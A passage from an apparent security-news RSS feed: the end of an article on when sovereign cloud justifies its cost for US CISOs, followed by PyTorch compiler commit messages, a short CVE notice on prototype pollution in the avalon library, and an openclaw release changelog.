<p>For US CISOs managing EU operations, EU subsidiaries or EU customers, the practical question is not whether sovereign cloud is philosophically correct. It is whether the additional cost and complexity deliver sufficient risk reduction for specific workloads. Most organizations I have worked with are over-applying sovereign cloud to workloads that do not need it, while under-applying it to the ones that do.</p>



<p>A working framework, refined across two years of European deployments. Use this as a quick triage for which workloads truly justify a sovereign cloud premium. As Kuppinger puts it: “Within an organization, varying levels of sovereignty demand for different use cases are the norm, not the exception.”</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Workload type</strong></td><td><strong>Sovereign cloud?</strong></td><td><strong>Why</strong></td></tr></thead><tbody><tr><td>NIS2-regulated processes</td><td><strong>Yes</strong></td><td>Legal obligation, board-level personal liability</td></tr><tr><td>High-risk AI under EU AI Act</td><td><strong>Yes</strong></td><td>Compliance from August 2026</td></tr><tr><td>Personal data with Schrems II exposure</td><td><strong>Yes</strong></td><td>Transfer risk without adequate protection</td></tr><tr><td>Sensitive metadata (access logs, AI telemetry)</td><td><strong>Yes</strong></td><td>Residency alone does not protect metadata</td></tr><tr><td>Dev/test environments</td><td>No</td><td>Significant cost premium (15–30%) with minimal risk reduction for most US-based operations</td></tr><tr><td>Non-sensitive SaaS workloads</td><td>No</td><td>Standard DPAs and encryption are usually sufficient; no strong US or EU regulatory driver</td></tr><tr><td>Internal productivity tools</td><td>No</td><td>No material regulatory exposure; high cost not justified by risk profile</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Five things European enterprises learned the hard way</h2>



<ul class="wp-block-list">
<li><strong>Sovereign cloud does not mean the hyperscaler cannot see your metadata. </strong>Customer-managed keys protect data at rest. They do not prevent the platform from logging access patterns, API calls and resource consumption. Know what your provider logs and where those logs go. For US CISOs: This matters for any hyperscaler operating under foreign data localization requirements you may face as the regulatory landscape evolves.</li>



<li><strong>Early sovereign cloud offerings had real service gaps — and exit is harder than expected. </strong>Many advanced AI/ML services were unavailable at launch; enterprises that committed early ended up running hybrid architectures more complex than anticipated. And lock-in in sovereign cloud contexts is harder to escape than standard cloud. Build exit strategy into procurement decisions before you sign.</li>



<li><strong>Identity governance cannot be deferred. </strong>The enterprises that got the most value from sovereign cloud investments had already done the identity governance work — asset inventory, access classification, non-human identity management. For US CISOs facing similar AI governance and resilience requirements: This is the lesson that will hurt most if you have not done the work.</li>



<li><strong>Sovereign from a hyperscaler is not the same as sovereign from a European provider. </strong>AWS European Sovereign Cloud, Microsoft Cloud for Sovereignty and Google Sovereign Cloud are structurally different from offerings built by IONOS, Hetzner, OVHcloud or Deutsche Telekom. The former offers broader service catalogs with sovereignty controls layered on. The latter offer cleaner legal structures with narrower feature sets. Neither is universally better — and the choice should follow workload characteristics, not procurement preference.</li>
</ul>



<h2 class="wp-block-heading">What US CISOs should do now</h2>



<p>If your organization has EU operations, subsidiaries or customers — or AI workloads sensitive enough that the regulatory direction in the US matters — these are decisions you will face. Three concrete steps.</p>



<p><strong>1. Classify your workloads by sensitivity and regulatory exposure before you classify them by cloud type. </strong>Not everything needs sovereign cloud. But know which workloads do before a regulator, auditor or customer’s procurement team asks.</p>



<p><strong>2. Audit your identity governance posture before your cloud strategy. </strong>Sovereign cloud without IAM maturity is expensive and insufficient. Governance has to happen at the identity layer, not the data center boundary.</p>



<p><strong>3. Read the contracts carefully. </strong>Key management, metadata logging, law enforcement access and service continuity provisions vary significantly between providers. Legal and security need to review them together — and AI workload provisions deserve their own column.</p>



<p>Europe’s sovereign cloud experiment is still running. The early results suggest the regulatory pressure is real, the market response is genuine and the operational complexity is higher than the marketing suggested. AI workloads make it more complex, not less. That is not a reason to avoid sovereign cloud — it is a reason to approach it with clearer eyes than the first wave of European adopters had. Buy the jurisdiction. Then govern the identity. In that order.</p>



<p><em>Sovereign cloud buys you a jurisdiction. Identity governance buys you control. AI workloads need both, and most enterprises are buying only one.</em></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/40df7254415ed93bfe83b9d406b44f171ecc5479: Fix flex_attention score_mod with no score gradient (#185991)]]></title>
<description><![CDATA[FlexAttention builds a joint graph for score_mod so the backward template can compute the gradient of the modified scores with respect to the raw attention scores. When score_mod returns a value that is independent of score, AOTAutograd correctly reports no gradient for the score input. The FlexA...]]></description>
<link>https://tsecurity.de/de/3598268/downloads/trunk40df7254415ed93bfe83b9d406b44f171ecc5479-fix-flexattention-scoremod-with-no-score-gradient-185991/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598268/downloads/trunk40df7254415ed93bfe83b9d406b44f171ecc5479-fix-flexattention-scoremod-with-no-score-gradient-185991/</guid>
<pubDate>Mon, 15 Jun 2026 08:46:57 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FlexAttention builds a joint graph for score_mod so the backward template can compute the gradient of the modified scores with respect to the raw attention scores. When score_mod returns a value that is independent of score, AOTAutograd correctly reports no gradient for the score input. The FlexAttention lowering did not handle that None result: Inductor still expects a score-gradient subgraph output for the dq/dk matmuls, so backward failed during lowering/kernel generation instead of treating the score gradient as zero.</p>
<p>Materialize a zero score gradient when the joint graph returns None for the score input. Constant joint graphs can lower that zero as a scalar/rank-1 Triton value, so the backward template now broadcasts only those low-rank grad_scores values to the score tile before the matmuls. Rank-2 gradients from normal differentiable score_mod paths skip the extra broadcast add.</p>
<p>I considered only adding a template-side fallback, but that would leave the higher-order op contract ambiguous: the joint graph should always provide a score-gradient value to the backward lowering. Materializing the zero in create_fw_bw_graph fixes that contract, while the template rank guard handles the generated representation needed by Triton.</p>
<p>Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2794665775" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/145050" data-hovercard-type="issue" data-hovercard-url="/pytorch/pytorch/issues/145050/hovercard" href="https://github.com/pytorch/pytorch/issues/145050">#145050</a></p>
<p>Generated by my agent</p>
<p>Benchmark Results:</p>
<ul>
<li>CUDA fp16 compiled flex_attention backward, B=1 H=1 S=512 D=64, score_mod returns score * 1.1, 5 warmup iterations and 50 CUDA-event timed iterations.</li>
<li>Baseline main median: 0.5343 ms; p10/p90: 0.4784/0.6628 ms.</li>
<li>Patched median: 0.5404 ms; p10/p90: 0.5289/0.5629 ms.</li>
<li>Result: no clear regression beyond run-to-run noise; baseline timings were bimodal in this environment, while patched timings stayed in the same envelope.</li>
</ul>
<p>Test Plan:</p>
<ul>
<li>Reproduced the issue before the fix with a minimal CUDA repro using torch.compile(flex_attention, dynamic=False), score_mod returning q_idx &gt;= kv_idx, and backward failing with InductorError / joint_subgraph_buffer is None.</li>
<li>Verified the repro after the fix: q.grad and k.grad are zero, v.grad is nonzero.</li>
<li>Verified backend="aot_eager" repro after the fix.</li>
<li>Verified differentiable score_mod=score * score smoke test after the fix.</li>
<li>python test/inductor/test_flex_attention.py -k test_score_mod_without_score_gradient</li>
<li>lintrunner -a</li>
</ul>
<p>Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4574804501" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/185991" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/185991/hovercard" href="https://github.com/pytorch/pytorch/pull/185991">#185991</a><br>
Approved by: <a href="https://github.com/drisspg">https://github.com/drisspg</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12209 | RubyLouvre avalon up to 2.2.10 Template Filter src/filters/index.js prototype pollution (EUVD-2026-36683)]]></title>
<description><![CDATA[A vulnerability was found in RubyLouvre avalon up to 2.2.10 and classified as critical. The impacted element is an unknown function of the file src/filters/index.js of the component Template Filter Handler. Such manipulation leads to improperly controlled modification of object prototype attribut...]]></description>
<link>https://tsecurity.de/de/3598249/sicherheitsluecken/cve-2026-12209-rubylouvre-avalon-up-to-2210-template-filter-srcfiltersindexjs-prototype-pollution-euvd-2026-36683/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598249/sicherheitsluecken/cve-2026-12209-rubylouvre-avalon-up-to-2210-template-filter-srcfiltersindexjs-prototype-pollution-euvd-2026-36683/</guid>
<pubDate>Mon, 15 Jun 2026 08:38:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/rubylouvre:avalon">RubyLouvre avalon up to 2.2.10</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. The impacted element is an unknown function of the file <em>src/filters/index.js</em> of the component <em>Template Filter Handler</em>. Such manipulation leads to improperly controlled modification of object prototype attributes.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-12209">CVE-2026-12209</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/757703a523f29b38beea5655fe7055b7ac477c42: fix _split_iteration_ranges error (#187209) (#187209)]]></title>
<description><![CDATA[Summary:
_split_iteration_ranges in torch/_inductor/codegen/simd.py ended with a bare assert all(... == 1 for s in remaining) that fired whenever a node's iteration lengths were consumed cleanly but left a non-unit extent in the kernel's tiling groups. This happens when a pointwise epilogue whose...]]></description>
<link>https://tsecurity.de/de/3597881/downloads/trunk757703a523f29b38beea5655fe7055b7ac477c42-fix-splititerationranges-error-187209-187209/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597881/downloads/trunk757703a523f29b38beea5655fe7055b7ac477c42-fix-splititerationranges-error-187209-187209/</guid>
<pubDate>Mon, 15 Jun 2026 04:46:06 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Summary:</p>
<p><code>_split_iteration_ranges</code> in <code>torch/_inductor/codegen/simd.py</code> ended with a bare <code>assert all(... == 1 for s in remaining)</code> that fired whenever a node's iteration lengths were consumed cleanly but left a non-unit extent in the kernel's tiling groups. This happens when a pointwise epilogue whose iteration domain is a strict sub-multiple of a template's tiling is considered for fusion, e.g. fusing a <code>[s, N]</code> epilogue into a <code>[K*s, N]</code> matmul template tile. The three divisibility exits earlier in the same function already <code>raise CantSplit</code>, and both callers that drive epilogue fusion (<code>SIMDKernel.is_compatible</code> and <code>Scheduler.speedup_by_fusion</code>) wrap the split in <code>try/except CantSplit</code> specifically to skip range-incompatible fusions and fall back to unfused codegen. Because the final invariant raised <code>AssertionError</code> instead of <code>CantSplit</code>, it escaped those handlers and hard-failed the entire AOTInductor compile with <code>InductorError: AssertionError: failed to set ranges ...</code>.</p>
<p>This PR converts the final invariant to <code>raise CantSplit(remaining, lengths)</code>, matching the exception contract of the rest of the function so the existing safety nets catch it. The success path is byte-for-byte unchanged (identical trigger condition), so models that compile today are unaffected; models that previously crashed now lower with the incompatible epilogue left unfused (a separate kernel) instead of aborting the compile.</p>
<p>Test Plan:<br>
Unit test (new regression):</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="buck2 test //caffe2/test/inductor:loop_ordering -- -r TestSplitIterationRanges"><pre class="notranslate"><code>buck2 test //caffe2/test/inductor:loop_ordering -- -r TestSplitIterationRanges
</code></pre></div>
<p>Result: Pass 7, Fail 0. testrun: <a href="https://www.internalfb.com/intern/testinfra/testrun/1688850234333388" rel="nofollow">https://www.internalfb.com/intern/testinfra/testrun/1688850234333388</a></p>
<p>The new case <code>test_leftover_extent_raises_cant_split</code> constructs <code>groups=[2, 2]</code>, <code>lengths=[[2], []]</code>: every size divides cleanly as it is consumed (so no <code>add_range</code> divisibility exit trips), but group 1 is left with extent <code>2</code>, producing <code>remaining=[1, 2]</code>. It asserts this raises <code>CantSplit</code> rather than <code>AssertionError</code>, exercising exactly the changed line.</p>
<p>Differential Revision: D108339950</p>
<p>Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652274047" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/187209" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/187209/hovercard" href="https://github.com/pytorch/pytorch/pull/187209">#187209</a><br>
Approved by: <a href="https://github.com/ColinPeppler">https://github.com/ColinPeppler</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ciflow/trunk/187209: fix _split_iteration_ranges error (#187209)]]></title>
<description><![CDATA[Summary:
_split_iteration_ranges in torch/_inductor/codegen/simd.py ended with a bare assert all(... == 1 for s in remaining) that fired whenever a node's iteration lengths were consumed cleanly but left a non-unit extent in the kernel's tiling groups. This happens when a pointwise epilogue whose...]]></description>
<link>https://tsecurity.de/de/3596442/downloads/ciflowtrunk187209-fix-splititerationranges-error-187209/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596442/downloads/ciflowtrunk187209-fix-splititerationranges-error-187209/</guid>
<pubDate>Sun, 14 Jun 2026 04:46:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Summary:</p>
<p><code>_split_iteration_ranges</code> in <code>torch/_inductor/codegen/simd.py</code> ended with a bare <code>assert all(... == 1 for s in remaining)</code> that fired whenever a node's iteration lengths were consumed cleanly but left a non-unit extent in the kernel's tiling groups. This happens when a pointwise epilogue whose iteration domain is a strict sub-multiple of a template's tiling is considered for fusion, e.g. fusing a <code>[s, N]</code> epilogue into a <code>[K*s, N]</code> matmul template tile. The three divisibility exits earlier in the same function already <code>raise CantSplit</code>, and both callers that drive epilogue fusion (<code>SIMDKernel.is_compatible</code> and <code>Scheduler.speedup_by_fusion</code>) wrap the split in <code>try/except CantSplit</code> specifically to skip range-incompatible fusions and fall back to unfused codegen. Because the final invariant raised <code>AssertionError</code> instead of <code>CantSplit</code>, it escaped those handlers and hard-failed the entire AOTInductor compile with <code>InductorError: AssertionError: failed to set ranges ...</code>.</p>
<p>This PR converts the final invariant to <code>raise CantSplit(remaining, lengths)</code>, matching the exception contract of the rest of the function so the existing safety nets catch it. The success path is byte-for-byte unchanged (identical trigger condition), so models that compile today are unaffected; models that previously crashed now lower with the incompatible epilogue left unfused (a separate kernel) instead of aborting the compile.</p>
<p>Test Plan:<br>
Unit test (new regression):</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="buck2 test //caffe2/test/inductor:loop_ordering -- -r TestSplitIterationRanges"><pre class="notranslate"><code>buck2 test //caffe2/test/inductor:loop_ordering -- -r TestSplitIterationRanges
</code></pre></div>
<p>Result: Pass 7, Fail 0. testrun: <a href="https://www.internalfb.com/intern/testinfra/testrun/1688850234333388" rel="nofollow">https://www.internalfb.com/intern/testinfra/testrun/1688850234333388</a></p>
<p>The new case <code>test_leftover_extent_raises_cant_split</code> constructs <code>groups=[2, 2]</code>, <code>lengths=[[2], []]</code>: every size divides cleanly as it is consumed (so no <code>add_range</code> divisibility exit trips), but group 1 is left with extent <code>2</code>, producing <code>remaining=[1, 2]</code>. It asserts this raises <code>CantSplit</code> rather than <code>AssertionError</code>, exercising exactly the changed line.</p>
<p>Differential Revision: D108339950</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/803b5d8d9e5b41e39c1d9a11537c30efdded9230: [Inductor][NVGEMM] Refactor rendering (#186184)]]></title>
<description><![CDATA[Replaces the Jinja template (nv_universal_gemm.py.jinja) with
IndentedBuffer codegen in NVUniversalGemmKernel.render(). Introduces
dataclasses (_VariantRenderSpec, _EpilogueRenderSpec) and module-level
helpers (_create_gemm_arguments, _create_gemm_cache_key,
_lookup_gemm_kernel) that are imported...]]></description>
<link>https://tsecurity.de/de/3596420/downloads/trunk803b5d8d9e5b41e39c1d9a11537c30efdded9230-inductornvgemm-refactor-rendering-186184/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596420/downloads/trunk803b5d8d9e5b41e39c1d9a11537c30efdded9230-inductornvgemm-refactor-rendering-186184/</guid>
<pubDate>Sun, 14 Jun 2026 04:01:46 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Replaces the Jinja template (nv_universal_gemm.py.jinja) with<br>
IndentedBuffer codegen in NVUniversalGemmKernel.render(). Introduces<br>
dataclasses (_VariantRenderSpec, _EpilogueRenderSpec) and module-level<br>
helpers (_create_gemm_arguments, _create_gemm_cache_key,<br>
_lookup_gemm_kernel) that are imported by the generated wrapper at<br>
runtime.</p>
<p>Restores disk cache (disk_cache_get/set) and the _precompile hook for<br>
subprocess parallel compilation that were present in the Jinja template.<br>
Cache keys now include strides, output metadata, and device for all<br>
tensor variants.</p>
<p>Authored with the help of an AI assistant (Claude).</p>
<p>Test Plan:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python test/inductor/test_nv_universal_gemm.py -v"><pre class="notranslate"><code>python test/inductor/test_nv_universal_gemm.py -v
</code></pre></div>
<p>Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585722236" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/186184" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/186184/hovercard" href="https://github.com/pytorch/pytorch/pull/186184">#186184</a><br>
Approved by: <a href="https://github.com/drisspg">https://github.com/drisspg</a><br>
ghstack dependencies: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585721987" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/186183" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/186183/hovercard" href="https://github.com/pytorch/pytorch/pull/186183">#186183</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.6.8-beta.1]]></title>
<description><![CDATA[2026.6.8
Highlights

Telegram and WhatsApp channel delivery are richer and less brittle: Telegram can send structured rich text with tables, lists, expandable blockquotes, prompt-preserving CLI backend delivery, retired native draft migration, and safer rich-media boundaries, while WhatsApp now h...]]></description>
<link>https://tsecurity.de/de/3596237/downloads/openclaw-202668-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596237/downloads/openclaw-202668-beta1/</guid>
<pubDate>Sun, 14 Jun 2026 00:01:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.6.8</h2>
<h3>Highlights</h3>
<ul>
<li>Telegram and WhatsApp channel delivery are richer and less brittle: Telegram can send structured rich text with tables, lists, expandable blockquotes, prompt-preserving CLI backend delivery, retired native draft migration, and safer rich-media boundaries, while WhatsApp now honors configured ACP bindings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655597962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92679" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92679/hovercard" href="https://github.com/openclaw/openclaw/pull/92679">#92679</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476451914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84082" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84082/hovercard" href="https://github.com/openclaw/openclaw/pull/84082">#84082</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570992089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89421" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89421/hovercard" href="https://github.com/openclaw/openclaw/pull/89421">#89421</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651736205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92513" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92513/hovercard" href="https://github.com/openclaw/openclaw/pull/92513">#92513</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spacegeologist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spacegeologist">@spacegeologist</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Agent and Gateway recovery is sharper across account-scoped DM sends, generated media completions, restart shutdown aborts, yielded subagent pauses, yielded cron media, heartbeat dedupe, session identity prompts, and unknown OpenAI agent selector rejection. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656886090" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92788/hovercard" href="https://github.com/openclaw/openclaw/pull/92788">#92788</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608679911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91246/hovercard" href="https://github.com/openclaw/openclaw/pull/91246">#91246</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4610905781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91357" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91357/hovercard" href="https://github.com/openclaw/openclaw/pull/91357">#91357</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654845566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92631" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92631/hovercard" href="https://github.com/openclaw/openclaw/pull/92631">#92631</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639558879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92146" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92146/hovercard" href="https://github.com/openclaw/openclaw/pull/92146">#92146</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4609318080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91287" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91287/hovercard" href="https://github.com/openclaw/openclaw/pull/91287">#91287</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4649907551" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92468" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92468/hovercard" href="https://github.com/openclaw/openclaw/pull/92468">#92468</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651687491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92510" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92510/hovercard" href="https://github.com/openclaw/openclaw/pull/92510">#92510</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ooiuuii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ooiuuii">@ooiuuii</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ZengWen-DT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ZengWen-DT">@ZengWen-DT</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Provider/model handling expands and tightens with GLM-5.2, Claude Haiku 4.5 catalog rows, OpenRouter and Google Vertex provider-prefix normalization, managed SecretRef auth, bounded model browse discovery, storeless OpenAI Responses replay gating, and Claude 4.5 Copilot tool-streaming safety. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656989414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92796/hovercard" href="https://github.com/openclaw/openclaw/pull/92796">#92796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585186905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90116" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90116/hovercard" href="https://github.com/openclaw/openclaw/pull/90116">#90116</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654773993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92627/hovercard" href="https://github.com/openclaw/openclaw/pull/92627">#92627</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608164776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91218/hovercard" href="https://github.com/openclaw/openclaw/pull/91218">#91218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597491219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90686" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90686/hovercard" href="https://github.com/openclaw/openclaw/pull/90686">#90686</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4643273391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92247/hovercard" href="https://github.com/openclaw/openclaw/pull/92247">#92247</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598134273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90706/hovercard" href="https://github.com/openclaw/openclaw/pull/90706">#90706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362622690" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75393" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75393/hovercard" href="https://github.com/openclaw/openclaw/pull/75393">#75393</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arkyu2077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arkyu2077">@arkyu2077</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bymle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bymle">@bymle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rohitjavvadi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rohitjavvadi">@rohitjavvadi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samson910022/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samson910022">@samson910022</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snowzlm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snowzlm">@snowzlm</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>.</li>
